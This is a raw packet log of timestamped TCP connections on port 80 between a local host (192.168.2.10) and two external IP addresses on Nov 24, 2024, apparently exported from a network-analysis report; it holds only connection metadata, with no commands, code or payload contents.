                                                            Nov 24, 2024 08:14:09.549426079 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.549472094 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.554121971 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.554212093 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.554214001 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.558896065 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.558985949 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.559043884 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.563831091 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.563848972 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.563994884 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.568506956 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.568592072 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.568661928 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.573287964 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.573353052 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.573513985 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.578067064 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.578233957 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.578268051 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.582799911 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.582896948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.582917929 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.587644100 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.587713003 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.587728024 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.592344046 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.592442036 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.592535973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597152948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597210884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.597253084 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.651876926 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.685503960 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.685550928 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.685697079 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.687505960 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.687618971 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.687815905 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.691210032 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.692624092 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.692673922 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.692702055 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.696440935 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.696502924 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.696540117 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700195074 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700316906 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.700367928 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.704030037 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.704123020 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.704144955 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707726002 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707842112 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.707839966 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.711309910 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.711390018 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.711432934 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.714747906 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.714855909 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.715039015 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.718183994 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.718266964 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.718275070 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.721570015 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.721661091 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.721697092 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.724873066 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.724953890 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.724992037 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728106022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728219986 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.728256941 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.731414080 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.731519938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.731549025 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.734622002 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.734711885 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.734735012 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.737911940 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.738008022 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.738032103 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.741090059 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.741173983 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.741182089 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744349003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744436026 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.744565964 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.747551918 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.747628927 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.747669935 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.750797987 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.750874043 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.750899076 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.754049063 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.754132986 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.754151106 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.757306099 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.757380962 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.757488966 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.760539055 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.760641098 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.760658026 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.763803005 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.763916016 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.763952017 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.767026901 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.767102957 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.767123938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.770256996 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.770344973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.770386934 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.773494959 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.773629904 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.773715973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.776776075 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.776864052 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.776876926 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.780018091 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.780121088 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.780136108 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.783262968 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.783320904 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.783344030 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.786488056 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.786587954 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.786598921 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.789747953 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.789805889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.789844990 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.792953014 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.793025017 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.793061018 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.796214104 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.796274900 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.796312094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.799473047 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.799542904 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.799561977 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.802685976 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.802774906 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.802797079 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.805939913 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.806015968 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.806047916 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.809209108 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.809262037 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.809281111 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.812434912 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.812515020 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.812541962 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.855051994 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.877446890 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.877537012 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.877659082 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.878701925 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.878781080 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.878833055 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.881165981 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.881293058 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.881357908 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.883673906 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.883781910 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.883944988 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.886178017 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.886267900 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.886353016 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.888619900 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.888752937 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.888834000 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.890996933 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.891102076 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.891208887 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.893394947 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.893465996 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.893577099 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.895771980 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.895823956 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.895910025 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.898006916 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.898130894 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.898220062 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.900223970 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.900296926 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.900403976 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.902481079 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.902601957 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.902678013 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.904671907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.904788017 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.904864073 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.906882048 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.907010078 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.907092094 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.909082890 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.909202099 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.909337044 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.911263943 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.911377907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.911462069 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.913399935 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.913507938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.913573980 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.915568113 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.915671110 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.915729046 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.917670965 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.917782068 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.917829037 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.919735909 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.919817924 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.919887066 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.921816111 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.921982050 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.922034025 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.923876047 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.923988104 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.924036980 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.925879002 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.925995111 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.926064968 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.927916050 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.928083897 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.928141117 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.929888010 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.930109024 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.930155993 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.931880951 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.931898117 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.931952000 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.933815956 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.933958054 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.934025049 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.935791016 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.935923100 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.935975075 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.937772036 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.937860966 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.937910080 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.938950062 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.939055920 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.939106941 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.940092087 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.940211058 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.940254927 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.941297054 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.941448927 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.941498041 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.942447901 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.942554951 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.942606926 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.943603039 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.943708897 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.943753958 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.944802046 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.944942951 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.944998026 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.946018934 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.946386099 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.946451902 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.947165012 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.947309971 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.947357893 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.948369980 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.948550940 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.948602915 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.949546099 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.949678898 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.949733973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.950614929 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.950731039 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.950819016 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.951803923 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.951925039 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.951984882 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.952974081 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.953121901 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.953628063 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.954158068 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.954375029 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.954451084 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.955420017 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.955446005 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.955508947 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.956537962 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.956792116 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.956839085 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.957623959 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.957761049 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.957811117 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.958926916 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.959043026 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.959088087 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.959995031 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.960287094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.960335016 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.961188078 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.961247921 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.965823889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:10.086221933 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:15.382498980 CET4992380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:15.502096891 CET804992313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:15.502182007 CET4992380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:15.518095016 CET4992380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:15.637702942 CET804992313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:16.693907976 CET804992313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:16.694001913 CET4992380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:17.027096987 CET4992380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:17.146608114 CET804992313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:18.046066999 CET4992980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:18.166790009 CET804992913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:18.166871071 CET4992980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:18.182549953 CET4992980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:18.302443981 CET804992913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:19.265098095 CET804992913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:19.265178919 CET4992980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:19.698875904 CET4992980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:19.818399906 CET804992913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:20.718084097 CET4993680192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:20.837661982 CET804993613.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:20.837819099 CET4993680192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:20.851950884 CET4993680192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:20.971554995 CET804993613.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:20.971596003 CET804993613.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:22.031680107 CET804993613.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:22.031897068 CET4993680192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:22.355091095 CET4993680192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:22.474606037 CET804993613.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:23.373925924 CET4994380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:23.493516922 CET804994313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:23.493678093 CET4994380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:23.503890038 CET4994380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:23.623440981 CET804994313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:24.686172009 CET804994313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:24.686278105 CET804994313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:24.686321020 CET4994380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:24.688894033 CET4994380192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:24.808305979 CET804994313.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:30.161731958 CET4995980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:30.281285048 CET804995913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:30.281590939 CET4995980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:30.302067041 CET4995980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:30.421792984 CET804995913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:31.429548025 CET804995913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:31.429610968 CET4995980192.168.2.1013.248.169.48
